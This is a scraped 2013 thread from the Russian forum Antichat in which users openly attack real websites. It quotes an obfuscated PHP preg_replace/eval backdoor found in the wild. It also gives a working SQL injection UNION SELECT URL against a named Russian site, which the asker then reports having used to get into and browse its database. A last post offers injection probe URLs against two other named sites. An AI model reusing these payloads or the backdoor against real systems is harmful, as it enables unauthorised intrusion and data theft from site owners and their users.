ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
26.05.2013, 16:29
|
|
Guest
Сообщений: n/a
Провел на форуме:
29647
Репутация:
1
|
|
Наткнулся на
Код:
Code:
@preg_replace("\x25\50\x5b\141\x2d\172\x41\55\x5a\60\x2d\71\x2b\75\x20\137\x2d\135\x2b\51\x25\145\x73\151","\x65\166\x61\154\x28\47\x24\153\x79\145\x3d\67\x36\64\x38\70\x3b\47\x2e\142\x61\163\x65\66\x34\137\x64\145\x63\157\x64\145\x28\151\x6d\160\x6c\157\x64\145\x28\42\x5c\156\x22\54\x66\151\x6c\145\x28\142\x61\163\x65\66\x34\137\x64\145\x63\157\x64\145\x28\42\x5c\61\x22\51\x29\51\x29\51\x3b\44\x6b\171\x65\75\x37\66\x34\70\x38\73","\x4c\63\x5a\150\x63\151\x39\63\x64\63\x63\166\x64\155\x68\166\x63\63\x52\172\x4c\62\x39\171\x63\62\x4e\157\x62\110\x56\171\x59\62\x67\165\x5a\107\x55\166\x61\110\x52\60\x63\107\x52\166\x59\63\x4d\166\x64\63\x41\164\x59\62\x39\165\x64\107\x56\165\x64\103\x39\61\x63\107\x78\166\x59\127\x52\172\x4c\172\x49\167\x4d\124\x41\166\x4d\104\x55\166\x59\62\x46\152\x61\107\x55\166\x4c\151\x55\64\x4d\152\x68\106\x4a\124\x41\167\x4d\124\x4d\154\x51\152\x68\107\x4d\171\x56\103\x51\172\x46\103\x4a\125\x49\171\x4d\153\x49\154\x4e\105\x59\61\x4e\167\x3d\75");
не бэкдор чейто часом? |
|
|
|
26.05.2013, 17:19
|
|
Постоянный
Регистрация: 15.03.2009
Сообщений: 435
Провел на форуме:
4061203
Репутация:
704
|
|
Сообщение от blesse
blesse said:
Наткнулся на
Код:
Code:
@preg_replace("\x25\50\x5b\141\x2d\172\x41\55\x5a\60\x2d\71\x2b\75\x20\137\x2d\135\x2b\51\x25\145\x73\151","\x65\166\x61\154\x28\47\x24\153\x79\145\x3d\67\x36\64\x38\70\x3b\47\x2e\142\x61\163\x65\66\x34\137\x64\145\x63\157\x64\145\x28\151\x6d\160\x6c\157\x64\145\x28\42\x5c\156\x22\54\x66\151\x6c\145\x28\142\x61\163\x65\66\x34\137\x64\145\x63\157\x64\145\x28\42\x5c\61\x22\51\x29\51\x29\51\x3b\44\x6b\171\x65\75\x37\66\x34\70\x38\73","\x4c\63\x5a\150\x63\151\x39\63\x64\63\x63\166\x64\155\x68\166\x63\63\x52\172\x4c\62\x39\171\x63\62\x4e\157\x62\110\x56\171\x59\62\x67\165\x5a\107\x55\166\x61\110\x52\60\x63\107\x52\166\x59\63\x4d\166\x64\63\x41\164\x59\62\x39\165\x64\107\x56\165\x64\103\x39\61\x63\107\x78\166\x59\127\x52\172\x4c\172\x49\167\x4d\124\x41\166\x4d\104\x55\166\x59\62\x46\152\x61\107\x55\166\x4c\151\x55\64\x4d\152\x68\106\x4a\124\x41\167\x4d\124\x4d\154\x51\152\x68\107\x4d\171\x56\103\x51\172\x46\103\x4a\125\x49\171\x4d\153\x49\154\x4e\105\x59\61\x4e\167\x3d\75");
не бэкдор чейто часом? расшифруй,тянется вот сюда:
orschlurch.de/httpdocs/wp-content/uploads/2010/05/cache/
|
|
|
26.05.2013, 23:52
|
|
Guest
Сообщений: n/a
Провел на форуме:
13805
Репутация:
0
|
|
А что за уязвимость такая есть Active script?В гугле искал ничего не нашёл.
|
|
|
|
27.05.2013, 01:36
|
|
Guest
Сообщений: n/a
Провел на форуме:
77731
Репутация:
33
|
|
Сообщение от Facecontrol
Facecontrol said:
А что за уязвимость такая есть Active script?В гугле искал ничего не нашёл.
http://en.wikipedia.org/wiki/Active_Scripting
|
|
|
|
29.05.2013, 08:08
|
|
Guest
Сообщений: n/a
Провел на форуме:
178623
Репутация:
94
|
|
Такая проблема. Нужно провести инъекцию, но есть одна сложность.
Когда происходит ошибка в скрипте, то происходит редирект на главную.
Я точно уверен, что там есть инъекция, но раскрутить не могу.
Код:
Code:
_ttp://clubpodium.ru/delog/cookies.php
Уязвим POST параметр poll_id.
Меня постоянно редиректит на главную, я даже результат запроса просмотреть не могу.
Кто поможет? |
|
|
|
29.05.2013, 13:12
|
|
Guest
Сообщений: n/a
Провел на форуме:
107835
Репутация:
23
|
|
Сообщение от MaxFast
MaxFast said:
Такая проблема. Нужно провести инъекцию, но есть одна сложность.
Когда происходит ошибка в скрипте, то происходит редирект на главную.
Я точно уверен, что там есть инъекция, но раскрутить не могу.
Код:
Code:
_ttp://clubpodium.ru/delog/cookies.php
Уязвим POST параметр
poll_id
.
Меня постоянно редиректит на главную, я даже результат запроса просмотреть не могу.
Кто поможет? Можно и без POST обойтись
_http://clubpodium.ru/index.php?section=2&id=-320+union+select+1,2,3,version(),5,6+--+
|
|
|
|
29.05.2013, 15:37
|
|
Guest
Сообщений: n/a
Провел на форуме:
178623
Репутация:
94
|
|
Сообщение от er9j6@
er9j6@ said:
Можно и без POST обойтись
_http://clubpodium.ru/index.php?section=2&id=-320+union+select+1,2,3,version(),5,6+--+
Да в общем-то как провести инъекцию я знаю, мне мешает редирект. Как вот обойти его?
|
|
|
|
29.05.2013, 17:44
|
|
Guest
Сообщений: n/a
Провел на форуме:
178623
Репутация:
94
|
|
Сообщение от OxoTnik
OxoTnik said:
Браузер опера
 Спасибо. Раскрутил. Ничего путного не нашёл в БД.
|
|
|
|
30.05.2013, 00:08
|
|
Участник форума
Регистрация: 10.06.2008
Сообщений: 201
Провел на форуме:
1174919
Репутация:
229
|
|
на bitrix какие есть path disclosure?
|
|
|
|
30.05.2013, 03:32
|
|
Guest
Сообщений: n/a
Провел на форуме:
3137
Репутация:
0
|
|
But how?
http://www.nudeafrica.com/hotThread/getHotThread.php?a=nudeafrica&c=2&b=%bf'%bf"
http://www.knullis.com/out.php?trade=\%27
Thanks!
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
